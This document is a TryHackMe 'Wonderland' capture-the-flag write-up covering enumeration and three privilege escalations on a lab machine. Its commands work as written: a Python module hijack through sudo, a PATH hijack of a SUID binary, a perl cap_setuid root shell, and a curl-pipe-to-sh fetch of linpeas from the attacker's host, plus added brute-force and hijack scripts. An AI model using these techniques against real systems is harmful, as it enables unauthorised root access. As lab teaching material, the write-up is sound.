Writeup — Wonderland
While browsing TryHackMe, I came across a particularly interesting room: Wonderland. The room is rated medium difficulty, and below I detail the complete steps to get to the end of it.
I will split the room into several major steps:
- Enumeration
- 1st privilege escalation
- 2nd privilege escalation
- 3rd privilege escalation
Enumeration
For this first step, as usual, I start with an nmap scan of the target machine with level 2 verbosity, a TCP SYN scan and service version detection (the SYN scan needs raw sockets, so run it as root):
nmap -vv -sS -sV RHOST
Nothing really interesting apart from an SSH server and a web server. Now let’s browse the site to see what we can get out of it.
Here again, nothing interesting except some text and an image. Let’s look for hidden directories with gobuster:
gobuster dir --wordlist=/usr/share/wordlists/dirb/common.txt --url=RHOST
Something interesting: a /r directory. Let’s go there and see what we can find inside.
The page hints that another directory or file is hiding under this URL. Let’s run gobuster again, this time against /r.
Indeed, another directory was hiding under /r. gobuster does not recurse on its own, so we run it against each directory it finds and end up at /r/a/b/b/i/t. A closer look at the page source pays off: SSH credentials are hidden inside!
Now that we have SSH credentials, let’s connect to the server and list the available users.
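The crawl described above is a loop: brute-force a directory, then brute-force every directory found inside it with the same wordlist, until nothing new turns up. The script below is an added example, not part of the original writeup; it implements that loop with a pluggable probe so the same crawler runs offline against a constructed fake tree (probe_fake, which mirrors the /r/a/b/b/i/t chain) or against a live host with curl (probe_http, which assumes the base URL is in TARGET). The short wordlist in WORDLIST is also constructed for the example.

```sh
#!/bin/sh
# Added example (not from the writeup): recursive directory brute force.
# crawl PROBE BASE prints every directory it finds under BASE, depth first,
# re-running the wordlist inside each hit, the way gobuster was run by hand
# against /r, then /r/a, and so on.

# Constructed wordlist (assumption). Against a real host you would use
# something like $(cat /usr/share/wordlists/dirb/common.txt).
WORDLIST="a b i r t rabbit"

# Live probe (not exercised offline). Assumes TARGET=http://RHOST is set.
# 200, 301 and 403 all mean the directory exists; anything else is a miss.
probe_http() {
    code=$(curl -s -o /dev/null -w '%{http_code}' "$TARGET$1/")
    [ "$code" = 200 ] || [ "$code" = 301 ] || [ "$code" = 403 ]
}

# Offline probe: a constructed tree holding the room's nested chain of
# one-letter directories and nothing else.
probe_fake() {
    case "$1" in
        /r|/r/a|/r/a/b|/r/a/b/b|/r/a/b/b/i|/r/a/b/b/i/t) return 0 ;;
        *) return 1 ;;
    esac
}

# Per-call state lives only in the positional parameters, so the recursion
# works in plain POSIX sh (no `local`).
crawl() {
    for w in $WORDLIST; do
        if "$1" "$2/$w"; then
            echo "$2/$w"
            crawl "$1" "$2/$w"
        fi
    done
}

# deepest PROBE: the longest path found, i.e. where the breadcrumb trail ends.
deepest() {
    crawl "$1" "" | awk 'length($0) > length(best) { best = $0 } END { print best }'
}

# Usage:  deepest probe_fake                      -> /r/a/b/b/i/t
#         TARGET=http://RHOST deepest probe_http
```

Treating 301 and 403 as hits matters: a directory without an index page usually answers 403, and a request without the trailing slash is redirected, so a crawler that only accepts 200 walks straight past the next level.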
Finally, let’s list the files in our current directory.
Interesting: a root.txt file (owned by root, with no read permission for us, so we can’t read it) and a Python file. Now that the research work is done, let’s try to escalate our privileges to root. Let’s try to get the keys to the kingdom.
First escalation
Above, we discovered a Python file. Let’s take a closer look at what it contains. Nothing crazy: it prints 10 random lines of a text, chosen with the random module imported at the top of the file.
An import, you say? Python looks in the directory of the script itself before the standard library, so a file named random.py sitting next to the script is what `import random` will load: we can override the random module. But what is the use if we can only run the script as alice? Let’s look at the sudo rights we have (sudo -l):
Wow! We can execute the Python file as rabbit! Let’s create a new random.py in the same directory that spawns a shell, then run the Python file as rabbit through sudo. The content of random.py:
import pty; pty.spawn("/bin/bash")
Okay, our first privilege escalation is done: id now reports rabbit. Let’s move on.
Second escalation
Now that we have access to the user rabbit, let’s look at what he has in his home directory.
It contains an interesting file: teaParty. The file is owned by root and has the SUID bit set, so at launch it runs with the owner’s privileges. Let’s dig into it. I copy the file to my own machine (scp will do, since we have SSH) to have all the tools I need, then run strings on it.
As strings shows, teaParty calls date without an absolute path. PATH is inherited from the caller and the binary does not sanitize it, so the lookup for date goes through whatever PATH we set. Let’s create our own date containing a shell spawner, and put its directory first in PATH so ours is found before /bin/date.
Now, it’s time to make date executable (chmod +x), run teaParty and…
We have our second privilege escalation: the shell we land in runs as hatter (check with id), and we can now retrieve hatter’s password from their home directory!
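The same hijack reproduced offline, as an added example (the writeup’s own steps are the ones above, and the code here is not from the room): a constructed shell script stands in for teaParty and calls date without a path, the rogue date is dropped into a directory of ours, that directory is put first in PATH, and the program’s unqualified call resolves to our script. The rogue date prints a marker instead of spawning a shell so the outcome can be checked. The underlying flaw generalizes: any privileged program that runs a command through the shell without an absolute path, or without setting PATH itself first, is hijackable by whoever controls its environment.

```sh
#!/bin/sh
# Added example (not the writeup's code): PATH hijack of an unqualified
# `date` call, reproduced offline.

# make_victim: a constructed stand-in for teaParty. The real thing is a
# compiled SUID binary; the only property that matters here is that it runs
# `date` through the shell without an absolute path.
make_victim() {
    work=$(mktemp -d)
    cat > "$work/teaParty" <<'EOF'
#!/bin/sh
echo "The tea party will start at $(date)"
EOF
    chmod +x "$work/teaParty"
    echo "$work"
}

# plant_date DIR: drops our own `date` into DIR and makes it executable.
# On the target its body is simply /bin/bash, which is the shell we land in.
plant_date() {
    cat > "$1/date" <<'EOF'
#!/bin/sh
echo "HIJACKED: date ran as uid $(id -u)"
EOF
    chmod +x "$1/date"
}

# run_party hijack|clean: runs the stand-in with our directory first in PATH
# (hijack) or with PATH untouched (clean), and prints what the program got
# back from `date`.
#   run_party hijack -> "HIJACKED: date ran as uid <n>"
#   run_party clean  -> the real date
run_party() {
    work=$(make_victim)
    mkdir "$work/bin"
    plant_date "$work/bin"
    if [ "$1" = hijack ]; then
        # Same thing as `export PATH=/tmp:$PATH; ./teaParty` on the target.
        PATH="$work/bin:$PATH" "$work/teaParty" | sed 's/.*start at //'
    else
        "$work/teaParty" | sed 's/.*start at //'
    fi
    rm -rf "$work"
}
```

The check worth doing before building the payload is simply `which date` after changing PATH: if it already prints your directory, the program’s own lookup will land there too.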
Third escalation
Now it’s time to go for the keys to the kingdom. Let’s enumerate the system with linpeas. Since the target machine doesn’t have Internet access, we serve the script from our own machine with Python’s built-in HTTP server (python3 -m http.server OUR_PORT, run in the directory holding linpeas.sh) and fetch it over the local network, keeping a copy of the output for later reading:
curl OUR_IP:OUR_PORT/linpeas.sh | sh | tee output
Digging through the output, we notice that perl can run anything with any UID: /usr/bin/perl has been granted the cap_setuid capability, which lets a process started by an unprivileged user change its UID at will (getcap -r / 2>/dev/null lists it).
So let’s spawn a new shell after switching to root’s UID:
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
There we go, the keys to the kingdom! Note the swap: user.txt is in /root and root.txt in /home/alice.